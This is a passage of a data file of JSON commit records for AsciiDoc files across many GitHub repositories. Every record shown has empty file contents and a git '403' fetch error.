manifest.yml\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DevOps\/IBM Cloud.adoc","new_file":"DevOps\/IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7358bea37e498376c858c5fd35456da6c61e6f","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2091bf35968249f5cbf75f864bdd152076a330f3","subject":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1632c6612577e1d05c97b693154203ff395e7f86","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d65cdf6cbdafa049d6a152518710a7d91962bcd2","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb95ec5b736fcb1f192431d8816d5799d87005e7","subject":"Updates based on feedback for Hawkular Metrics - Roadmap","message":"Updates based on feedback for Hawkular Metrics - Roadmap\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1f7b9848ee29dbba4f715965e0a1c6e3dd910e5","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"710a4639f1566d59899a0856d6b98b5203c62b5f","subject":"DATAKV-265 - Create security policy readme.","message":"DATAKV-265 - Create security policy readme.\n","repos":"spring-projects\/spring-data-keyvalue","old_file":"SECURITY.adoc","new_file":"SECURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-data-keyvalue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7756aabf82797329c235e0cdad7a435a574cd8ca","subject":"Update 2015-08-23-Define-Extrapolate.adoc","message":"Update 2015-08-23-Define-Extrapolate.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ab66397b8cdf4d5c17edb9f82fd8fe1ec1a8c4f","subject":"Renamed README file.","message":"Renamed README file.\n","repos":"javaclinic\/20140305-spring-overview","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javaclinic\/20140305-spring-overview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec74a3989269c67e90fa47c444fa01c42f5fefd6","subject":"Update 2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","message":"Update 2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","new_file":"_posts\/2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"951ee4bc29ebf1eff1cb44694a75f579172cf9aa","subject":"y2b create post California Headphones Hands On CES 2012","message":"y2b create post California Headphones Hands On CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-California-Headphones-Hands-On-CES-2012.adoc","new_file":"_posts\/2012-01-12-California-Headphones-Hands-On-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef5cbdbb4ec5e2075f968a56b2da893b230cc98a","subject":"v1.79","message":"v1.79\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c281b3c82ebeaf57af97f184374f6f48f20ac56","subject":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6395e89cfca42d168b89da8e71df0e337daa5b66","subject":"Vault Guide v1 (#9772)","message":"Vault Guide v1 (#9772)\n\n* Vault Guide v1\r\n\r\nContaining only Kubernetes \/ OpenShift secrets via file based vault for now\r\n\r\nCloses #9462\r\n\r\n* Apply suggestions from code review\r\n\r\nCo-authored-by: Andrea Peruffo <a64e5d202a2d5136a788c62495372a31883d5efc@gmail.com>\r\n\r\nCo-authored-by: Andrea Peruffo <a64e5d202a2d5136a788c62495372a31883d5efc@gmail.com>","repos":"thomasdarimont\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,stianst\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,ahus1\/keycloak,ahus1\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,srose\/keycloak,srose\/keycloak,srose\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,mhajas\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,ahus1\/keycloak,reneploetz\/keycloak,jpkrohling\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,srose\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,mhajas\/keycloak,abstractj\/keycloak,srose\/keycloak,stianst\/keycloak,abstractj\/keycloak,mhajas\/keycloak,keycloak\/keycloak,jpkrohling\/keycloak,mhajas\/keycloak,stianst\/keycloak,raehalme\/keycloak,ahus1\/keycloak,hmlnarik\/keycloak,keycloak\/keycloak,hmlnarik\/keycloak,stianst\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,mhajas\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,reneploetz\/keycloak,raehalme\/keycloak","old_file":"docs\/guides\/src\/main\/server\/vault.adoc","new_file":"docs\/guides\/src\/main\/server\/vault.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fd5213925da04430b3ccd5a3745c12139e71edd0","subject":"job #12203 - Analysis note","message":"job #12203 - Analysis note\n\nIssue appears to be the opening curly bracket causes the\nPattern.compile() to fail.\n","repos":"travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12203\/12203_regex_compile_curly_ant.adoc","new_file":"doc-bridgepoint\/notes\/12203\/12203_regex_compile_curly_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e94ed6ea060c367740cf95688a3588730ca80d8c","subject":"OGM-486 Update Neo4j documentation","message":"OGM-486 Update Neo4j documentation\n","repos":"uugaa\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,hferentschik\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,ZJaffee\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-contrib,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,jhalliday\/hibernate-ogm,emmanuelbernard\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,jhalliday\/hibernate-ogm,ZJaffee\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b7926ba33430389ae946a762a6a9eef4edea998c","subject":"OGM-736 Move Neo4J + Transaction requirement as CAUTION","message":"OGM-736 Move Neo4J + Transaction requirement as CAUTION\n\nAlso added to the site's FAQ in parallel\n","repos":"gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,jhalliday\/hibernate-ogm,ZJaffee\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,mp911de\/hibernate-ogm,uugaa\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,jhalliday\/hibernate-ogm,tempbottle\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,uugaa\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"46ebbaac45e56d1db783345370c285c5b7f27a1a","subject":"added publish_checklist","message":"added publish_checklist\n","repos":"S-Mach\/s_mach.codetools","old_file":"publish_checklist.asciidoc","new_file":"publish_checklist.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/S-Mach\/s_mach.codetools.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6c3db0266ffb69d466a2bf0e5edecbb89c60ade","subject":"Adding release notes for release of coverage revapi_java_spi revapi_java","message":"Adding release notes for release of coverage revapi_java_spi revapi_java\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210714-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210714-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73ae908832ccfa77737bbf8e8792a7f31d57eddf","subject":"Update 2017-06-07-Debugging-Information-Success.adoc","message":"Update 2017-06-07-Debugging-Information-Success.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-06-07-Debugging-Information-Success.adoc","new_file":"_posts\/2017-06-07-Debugging-Information-Success.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26254866a86a5f71384f9dad7012e883a117ea3c","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc23517bd2b778bc1481f51bc554a10e219e67b8","subject":"y2b create post 10 Awesome Gadgets You Can Buy Right Now!","message":"y2b create post 10 Awesome Gadgets You Can Buy Right Now!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-30-10-Awesome-Gadgets-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2017-06-30-10-Awesome-Gadgets-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f69b16ed5a56f927636cc36a9d83cf56224728b","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"547707586c7326d3fb48b0de7133ea7f31c924e2","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7505cfa4caed283ed1ab399043b41fddc3394ea9","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f30628742085cf32f5b77c3d6562b8b70b28ecc","subject":"Update 2017-12-31-Seventeen.adoc","message":"Update 2017-12-31-Seventeen.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-31-Seventeen.adoc","new_file":"_posts\/2017-12-31-Seventeen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93932fd745342452014d3c194c56112fe21d7abf","subject":"Update 2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","message":"Update 2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_file":"_posts\/2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14f32367a52515ab7f0682c257d6dbcf2edf5756","subject":"Renamed '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc' to '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc'","message":"Renamed '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc' to '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc'","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc","new_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d584e749ac277f9be9ee94b52b654088fc9de36b","subject":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","message":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b770721afc211253daacf260437ed5fd74e12910","subject":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","message":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ba10c9de830110ebfd5b073fdb41bb4c43d3a68","subject":"Publish 2013-5-12-Test-Notes.adoc","message":"Publish 2013-5-12-Test-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Test-Notes.adoc","new_file":"2013-5-12-Test-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64e1ad0b5be0bf03582588f21c01fa3e8112a81f","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f904181221a52e6b008be977cdee51dd495e9285","subject":"fix the apendix","message":"fix the apendix\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2e5e7653cd6e8a4cb1d69a88e571b7f267c644c","subject":"Add mention of WebFlux testing support","message":"Add mention of WebFlux testing support\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/web-flux.adoc","new_file":"src\/asciidoc\/web-flux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a616ad6f51bd73db17e671e7441d7f58ce4d813b","subject":"Update 2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","message":"Update 2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","new_file":"_posts\/2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c08b5ddeb99c59f32c0b8b9ad48e1a169bf1c8e","subject":"Update 2017-02-26-University-vs-Practical-Product-Ownership.adoc","message":"Update 